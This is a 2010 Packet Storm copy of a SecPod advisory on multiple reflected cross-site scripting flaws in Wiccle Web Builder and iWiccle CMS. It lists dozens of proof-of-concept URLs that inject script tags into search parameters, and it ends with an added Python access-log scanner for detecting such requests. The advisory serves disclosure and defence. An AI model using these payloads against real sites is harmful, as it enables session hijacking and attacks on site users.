Source: packetstorm | Author: Veerendra G.G | ID: PACKETSTORM:95079
Published: Oct 22, 2010 - 12:00 a.m.

Wiccle Web Builder CMS / iWiccle CMS Community Builder Cross Site Scripting

packetstormsecurity.com
`##############################################################################  
Wiccle Web Builder CMS and iWiccle CMS Community Builder Multiple Cross-Site  
Scripting Vulnerabilities.  
  
SecPod Technologies (www.secpod.com)  
Author Veerendra G.G  
###############################################################################  
  
SecPod ID: 1005  
  
09/07/2010 Issue Discovered  
09/10/2010 Vendor Notified  
09/13/2010 Vendor Confirmed  
09/14/2010 Fix Available  
  
  
Class: Cross-Site Scripting  
Severity: Medium  
  
  
Overview:  
---------  
Wiccle Web Builder CMS and iWiccle CMS Community Builder are prone to multiple  
Cross-Site Scripting vulnerabilities.  
  
  
Technical Description:  
----------------------  
Wiccle Web Builder CMS and iWiccle CMS Community Builder are prone to multiple  
Cross-Site Scripting vulnerabilities because they fail to properly sanitize  
user-supplied input.  
  
NOTE: The vulnerabilities are exploitable when magic_quotes_gpc is Off (magic_quotes_gpc = Off)  
  
1) Input passed via the 'member_city' parameter to 'index.php' when 'module' is  
set to 'dating' and 'show' is set to 'member_search' is not properly verified  
before it is returned to the user.  
  
NOTE: This vulnerability exists only in Wiccle Web Builder CMS  
  
POC:  
* http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1  
  
* http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30  
  
  
2) Input passed via the 'post_name', 'post_text', 'post_tag' and 'post_member_name'  
parameters to 'index.php' when 'module' is set to one of various options  
(Auctions, Audio, etc.) and 'show' is set to 'post_search' is not properly  
verified before it is returned to the user.  
  
NOTE: This vulnerability exists in both the products (Wiccle Web Builder CMS  
and iWiccle CMS Community Builder).  
  
POC:  
* http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>  
  
* http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>  
  
  
3) Input passed via the 'member_username' and 'member_tags' parameters to 'index.php'  
when 'module' is set to 'members' and 'show' is set to 'member_search' is not  
properly verified before it is returned to the user.  
  
NOTE: This vulnerability exists in both the products (Wiccle Web Builder CMS  
and iWiccle CMS Community Builder).  
  
POC:  
* http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>  
  
* http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>  
  
  
These can be exploited to execute arbitrary HTML and script code in a user's  
browser session in the context of a vulnerable site. This may allow an attacker  
to steal cookie-based authentication and launch further attacks.  
  
The exploit has been tested in Wiccle Web Builder CMS 2.0 (wwb_101.zip) and  
iWiccle CMS Community Builder (iwiccle_1211.zip).  
  
  
Impact:  
--------  
Successful exploitation could allow an attacker to execute arbitrary HTML and  
script code in a user's browser session in the context of a vulnerable site.  
  
  
Affected Software:  
------------------  
Wiccle Web Builder CMS 2.0 (wwb_101.zip)  
iWiccle CMS Community Builder 2.0 (iwiccle_1211.zip)  
  
  
References:  
-----------  
http://www.wiccle.com/  
http://secpod.org/blog/?p=130  
http://wiccle.com/download/wwb_101.zip  
http://wiccle.com/download/iwiccle_1211.zip  
http://secpod.org/advisories/SECPOD_Wiccle_Web_Builder_and_iWiccle_CMS_Community_Builder.txt  
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas  
  
  
Other POCs:  
-----------  
http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=store&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=downloads&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=guestbook&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=help&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=notebox&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=polls&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=portfolio&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=support&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
  
Workaround:  
-----------  
Not available  
  
  
Solution:  
---------  
Upgrade to iWiccle CMS Community Builder 1.3.0 (iwiccle_130.zip)  
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas  
  
  
Risk Factor:  
-------------  
CVSS Score Report  
ACCESS_VECTOR = NETWORK  
ACCESS_COMPLEXITY = MEDIUM  
AUTHENTICATION = NONE  
CONFIDENTIALITY_IMPACT = NONE  
INTEGRITY_IMPACT = PARTIAL  
AVAILABILITY_IMPACT = NONE  
EXPLOITABILITY = PROOF_OF_CONCEPT  
REMEDIATION_LEVEL = UNAVAILABLE  
REPORT_CONFIDENCE = CONFIRMED  
CVSS Base Score = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)  
  
Credits:  
--------  
Veerendra G.G of SecPod Technologies has been credited with the discovery of  
this vulnerability.  
  
`
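
For sites still running the affected versions, the parameter and route names in the Technical Description can drive a log review. The following is an added example, not part of the SecPod advisory: it scans web-server access-log lines for requests to `index.php` where `show` is `member_search` or `post_search` and one of the listed parameters decodes to HTML markup. The log format (combined), the sample lines, the markup heuristic and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# 'show' value -> parameters the advisory lists as reflected without sanitization.
# The advisory text says 'post_tag' while its PoC URLs use 'post_tags'; watch both.
REFLECTED = {
    "member_search": {"member_city", "member_username", "member_tags"},
    "post_search": {"post_name", "post_text", "post_tag", "post_tags", "post_member_name"},
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Heuristic (assumption): '<' directly followed by a tag-start character.
MARKUP = re.compile(r"<[A-Za-z/!?]")

def suspicious_params(log_line):
    """Return the advisory-listed parameters in this request that carry markup."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/index.php"):
        return []
    query = parse_qs(url.query, keep_blank_values=True)  # decodes %XX once
    watched = set()
    for show in query.get("show", []):
        watched |= REFLECTED.get(show, set())
    hits = set()
    for name in watched.intersection(query):
        for value in query[name]:
            # Second unquote catches double-encoded values (%253C -> %3C -> <).
            if MARKUP.search(value) or MARKUP.search(unquote(value)):
                hits.add(name)
    return sorted(hits)

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Oct/2010:10:01:12 +0000] "GET /wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_city=%3Cscript%3Ealert(%27XSS-Test%27)%3C%2Fscript%3E HTTP/1.1" 200 5120',
    '203.0.113.7 - - [22/Oct/2010:10:01:40 +0000] "GET /iwiccle_1211/index.php?module=articles&show=post_search&post_name=%3Cscript%3Ealert(%27XSS-Test%27)%3C%2Fscript%3E&post_tags=%3Cscript%3Ealert(%27XSS-Test%27)%3C%2Fscript%3E HTTP/1.1" 200 6033',
    '198.51.100.4 - - [22/Oct/2010:10:02:05 +0000] "GET /wwb_101/index.php?module=members&show=member_search&member_username=alice&member_tags=music HTTP/1.1" 200 4200',
    '198.51.100.9 - - [22/Oct/2010:10:03:17 +0000] "GET /wwb_101/index.php?module=news&show=post_search&post_text=a+%3C+b HTTP/1.1" 200 3900',
    '203.0.113.7 - - [22/Oct/2010:10:04:52 +0000] "GET /wwb_101/index.php?module=blogs&show=post_search&post_text=%253Cscript%253E HTTP/1.1" 200 3950',
]

def scan(lines):
    """Map line index -> flagged parameter names, for lines with at least one hit."""
    return {i: hits for i, line in enumerate(lines) if (hits := suspicious_params(line))}

if __name__ == "__main__":
    for index, params in scan(SAMPLE_LOG).items():
        print(f"line {index}: markup in {', '.join(params)}")
```

A hit only shows that markup was submitted to a parameter the advisory names; whether it was reflected depends on the installed version and on the magic_quotes_gpc setting noted above.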